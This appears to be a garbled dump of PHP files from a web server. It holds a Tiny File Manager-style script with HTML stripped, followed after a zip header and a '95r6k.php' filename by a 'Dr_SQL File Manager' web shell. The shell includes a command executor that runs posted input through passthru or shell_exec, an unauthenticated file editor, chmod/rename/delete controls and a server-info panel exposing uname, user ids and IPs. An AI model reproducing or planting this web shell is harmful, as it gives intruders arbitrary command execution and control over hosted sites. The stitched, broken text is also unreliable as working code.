$file = $_POST['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $mode = 0; if (!empty($_POST['ur'])) { $mode |= 0400; } if (!empty($_POST['uw'])) { $mode |= 0200; } if (!empty($_POST['ux'])) { $mode |= 0100; } if (!empty($_POST['gr'])) { $mode |= 0040; } if (!empty($_POST['gw'])) { $mode |= 0020; } if (!empty($_POST['gx'])) { $mode |= 0010; } if (!empty($_POST['or'])) { $mode |= 0004; } if (!empty($_POST['ow'])) { $mode |= 0002; } if (!empty($_POST['ox'])) { $mode |= 0001; } if (@chmod($path . '/' . $file, $mode)) { fm_set_msg(lng('Permissions changed')); } else { fm_set_msg(lng('Permissions not changed'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $parent = fm_get_parent_path(FM_PATH); $objects = is_readable($path) ? scandir($path) : array(); $folders = array(); $files = array(); $current_path = array_slice(explode("/",$path), -1)[0]; if (is_array($objects) and fm_is_exclude_items($current_path)) { foreach ($objects as $file) { if ($file == '.' || $file == '..') { continue; } if (!FM_SHOW_HIDDEN and substr($file, 0, 1) === '.') { continue; } $new_path = $path . '/' . $file; if (@is_file($new_path) and fm_is_exclude_items($file)) { $files[] = $file; } elseif (@is_dir($new_path) and $file != '.' and $file != '..' and fm_is_exclude_items($file)) { $folders[] = $file; } } } if (!empty($files)) { natcasesort($files); } if (!empty($folders)) { natcasesort($folders); } if (isset($_GET['upload']) and !FM_READONLY) { fm_show_header(); fm_show_nav_path(FM_PATH); function getUploadExt() { $extArr = explode(',', FM_UPLOAD_EXTENSION); if(FM_UPLOAD_EXTENSION and $extArr) { array_walk($extArr, function(&$x) {$x = ".$x";}); return implode(',', $extArr); } return ''; } ?>

:

' . PHP_EOL; } ?>

: , ', $copy_files) ?>

:
/

 

Copying

Source path:
Destination folder:

Copy   Move   Cancel

/>
/>
/>

monactinellidan

""

:
File size:
MIME-type:
:
:
:
: %
'.lng('Image size').': ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '
'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo ''.lng('Charset').': ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; } ?>

 
 
     
'; } else if($online_viewer == 'microsoft') { echo ''; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo ''; foreach ($filenames as $fn) { if ($fn['folder']) { echo '' . fanco($fn['name']) . '
'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; } } echo ''; } else { echo '

'.lng('Error while fetching archive info').'

'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '

'; } } elseif ($is_audio) { // Audio content echo '

'; } elseif ($is_video) { // Video content echo '
'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '
' . fanco($content) . '
'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '
' . fanco($content) . '
'; } echo $content; } ?>
'. $file. ''; header('X-XSS-Protection:0'); fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; // normal editer $isNormalEditor = true; if (isset($_GET['env'])) { if ($_GET['env'] == "ace") { $isNormalEditor = false; } } // Save File if (isset($_POST['savedata'])) { $writedata = $_POST['savedata']; $fd = fopen($file_path, "w"); @fwrite($fd, $writedata); fclose($fd); fm_set_msg(lng('File Saved Successfully')); } $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize = filesize($file_path); $is_text = false; $content = ''; // for text if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?>
' . htmlspecialchars($content) . ''; echo ''; } elseif ($is_text) { echo '
' . htmlspecialchars($content) . '
'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?>

:

 

'?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?> '?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
..
>
' . readlink($path . '/' . $f) . '' : '') ?>
 ">
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?>
monactinellidan
monactinellidan
"; return; } echo "$external[$key]"; } function verifyToken($token) { if (hash_equals($_SESSION['token'], $token)) { return true; } return false; } /** * Delete file or folder (recursively) * @param string $path * @return bool */ function fm_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } function fm_rchmod($path, $filemode, $dirmode) { if (is_dir($path)) { if (!chmod($path, $dirmode)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { return false; } } } } return true; } elseif (is_link($path)) { return true; } elseif (is_file($path)) { return chmod($path, $filemode); } return false; } function fm_is_valid_ext($filename) { $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; $ext = pathinfo($filename, PATHINFO_EXTENSION); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; return ($isFileAllowed) ? true : false; } function fm_rename($old, $new) { $isFileAllowed = fm_is_valid_ext($new); if(!is_dir($old)) { if (!$isFileAllowed) return false; } return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null; } function fm_rcopy($path, $dest, $upd = true, $force = true) { if (is_dir($path)) { if (!fm_mkdir($dest, $force)) { return false; } $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) { $ok = false; } } } } return $ok; } elseif (is_file($path)) { return fm_copy($path, $dest, $upd); } return false; } function fm_mkdir($dir, $force) { if (file_exists($dir)) { if (is_dir($dir)) { return $dir; } elseif (!$force) { return false; } unlink($dir); } return mkdir($dir, 0777, true); } function fm_copy($f1, $f2, $upd) { $time1 = filemtime($f1); if (file_exists($f2)) { $time2 = filemtime($f2); if ($time2 >= $time1 and $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } function fm_get_display_path($file_path) { global $path_display_mode, $root_path, $root_url; switch ($path_display_mode) { case 'relative': return array( 'label' => 'Path', 'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path))) ); case 'host': $relative_path = str_replace($root_path, '', $file_path); return array( 'label' => 'Host Path', 'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) ); case 'full': default: return array( 'label' => 'Full Path', 'path' => fanco(fm_convert_win($file_path)) ); } } function fm_is_exclude_items($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) { return true; } return false; } function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } function fm_get_size($file) { static $iswin; static $isdarwin; if (!isset($iswin)) { $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); } if (!isset($isdarwin)) { $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); } static $exec_works; if (!isset($exec_works)) { $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo EXEC') == 'EXEC'); } // try a shell command if ($exec_works) { $arg = escapeshellarg($file); $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // try the Windows COM interface if ($iswin and class_exists("COM")) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile( realpath($file) ); $size = $f->Size; } catch (Exception $e) { $size = null; } if (ctype_digit($size)) { return $size; } } // if all else fails return filesize($file); } function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = ($size > 0) ? floor(log($size, 1024)) : 0; $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } function fm_get_directorysize($directory) { $bytes = 0; $directory = realpath($directory); if ($directory !== false and $directory != '' and file_exists($directory)){ foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){ $bytes += $file->getSize(); } } return $bytes; } function fm_get_zif_info($path, $ext) { if ($ext == 'zip' and function_exists('zip_open')) { $arch = @zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = @zip_read($arch)) { $zip_name = @zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => @zip_entry_filesize($zip_entry), 'compressed_size' => @zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder ); } @zip_close($arch); return $filenames; } } elseif($ext == 'tar' and class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach(new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("ph" . "ar://".$path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } function fanco($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } function fm_set_msg($msg, $status = 'ok') { $_SESSION[DN_CESSION_ID]['message'] = $msg; $_SESSION[DN_CESSION_ID]['status'] = $status; } function fm_is_utf8($string) { return preg_match('//u', $string); } function fm_convert_win($filename) { if (FM_IS_WIN and function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } function fm_object_to_array($obj) { if (!is_object($obj) and !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'ts': case 'jsx': case 'tsx': case 'hbs': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': case 'htaccess': case 'yaml': case 'yml': case 'toml': case 'tmp': case 'top': case 'bot': case 'dat': case 'bak': case 'htpasswd': case 'pl': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'tbz2': case 'tbz': case 'zip': case 'rar': case 'gz': case 'tgz': case 'tar': case '7z': case 'xz': case 'txz': case 'zst': case 'tzst': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': case 'webm': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl' ); } function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', 'application/json', ); } function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'monactinellidan
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) and count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[DN_CESSION_ID]['message'] . '

'; unset($_SESSION[DN_CESSION_ID]['message']); unset($_SESSION[DN_CESSION_ID]['status']); } } function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fanco(APP_TITLE) ?> ">
'; } ?> <?php echo fanco(APP_TITLE) ?> ">
PK\m\Q0,0, 95r6k.phpnu[ Dr_SQL HTML; // === Breadcrumb === function getBreadcrumb($path) { $parts = explode('/', trim(str_replace('\\', '/', $path), '/')); $build = ''; $curr = '/'; $html = 'Root'; foreach ($parts as $part) { if ($part === '') continue; $curr = rtrim($curr, '/') . '/' . $part; $html .= ' / ' . htmlspecialchars($part) . ''; } return $html; } echo '
'; echo '

📁 Dr_SQL File Manager

'; echo '[Info]'; echo '
'; echo '
' . getBreadcrumb($current_dir) . '
'; // === Quick Actions === $enc_dir = urlencode($current_dir); echo <<
ACTIONS; // === File List === $items = []; if ($dh = @opendir('.')) { while (($f = readdir($dh)) !== false) { if ($f === '.' || $f === '..') continue; $items[] = $f; } closedir($dh); natcasesort($items); // Natural sort (a1, a10, a2 → a1, a2, a10) } echo ''; echo ''; echo ''; foreach ($items as $item) { $path = $current_dir . DIRECTORY_SEPARATOR . $item; $isDir = is_dir($item); $size = $isDir ? '-' : number_format(filesize($item)); $perm = substr(sprintf('%o', fileperms($item)), -4); $color = is_writable($item) ? 'perm-writable' : (is_readable($item) ? 'perm-readable' : 'perm-locked'); // Owner/Group $owner = $group = '???'; if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) { $o = @posix_getpwuid(@fileowner($item)); $g = @posix_getgrgid(@filegroup($item)); $owner = $o ? $o['name'] : '???'; $group = $g ? $g['name'] : '???'; } $enc_item = urlencode($item); $enc_path = urlencode($path); $edit_link = $isDir ? "?d={$enc_path}" : "?x=edit&f={$enc_item}"; $name_display = htmlspecialchars($item) . ($isDir ? '/' : ''); echo ''; echo ""; echo ""; echo ""; echo ""; echo ""; } echo '
NameSizePermissionsOwner/GroupActions
{$name_display}{$size}{$perm}{$owner}:{$group}"; // Actions if (!$isDir) { echo "Edit"; } // Rename Popup echo " Rename"; echo "
"; echo "
"; echo ""; echo ""; echo ""; echo " "; echo " "; echo "
"; // Chmod Popup echo " Chmod"; echo "
"; echo "
"; echo ""; echo ""; echo ""; echo " "; echo " "; echo "
"; // Delete $del_action = $isDir ? 'delete_dir' : 'delete_file'; echo " Del"; echo "
'; // === Handle Special Views === if ($_GET['x'] === 'edit') { $file = urldecode($_GET['f']); if ($_POST['save'] === '1') { file_put_contents($file, $_POST['content']); echo '
✅ Saved!
'; } $content = file_exists($file) ? htmlspecialchars(file_get_contents($file)) : ''; echo '

✏️ Editing: ' . htmlspecialchars($file) . '

'; echo '
'; echo ''; echo '
'; echo ''; echo ' ← Back'; echo '
'; } elseif ($_GET['x'] === 'info') { // Info panel (same as before) $moreI = [ 'PHP Version' => phpversion(), 'Server Software' => $_SERVER['SERVER_SOFTWARE'], 'Uname' => php_uname(), 'User' => get_current_user() . ' (uid:' . getmyuid() . ' gid:' . getmygid() . ')', 'Safe Mode' => ini_get('safe_mode') ? 'ON' : 'OFF', 'Open BaseDir' => ini_get('open_basedir') ?: 'OFF', 'MySQL' => function_exists('mysqli_connect') ? 'ON' : 'OFF', 'Curl' => extension_loaded('curl') ? 'ON' : 'OFF', 'Disk Total' => @disk_total_space('/') ? round(@disk_total_space('/') / (1024**3), 2) . ' GB' : 'N/A', 'Disk Free' => @disk_free_space('/') ? round(@disk_free_space('/') / (1024**3), 2) . ' GB' : 'N/A', 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR'] ?? 'N/A' ]; echo '

ℹ️ System Info

'; foreach ($moreI as $k => $v) { echo ""; } echo '
{$k}: {$v}

← Back'; } elseif ($_GET['x'] === 'cmd') { if ($_POST['cmd']) { echo '
';
        if (function_exists('passthru')) {
            @passthru($_POST['cmd']);
        } elseif (function_exists('shell_exec')) {
            echo @shell_exec($_POST['cmd']);
        } else {
            echo "Command execution not available.";
        }
        echo '
'; } echo '

💻 Command Executor

'; echo '
'; echo '
'; echo '
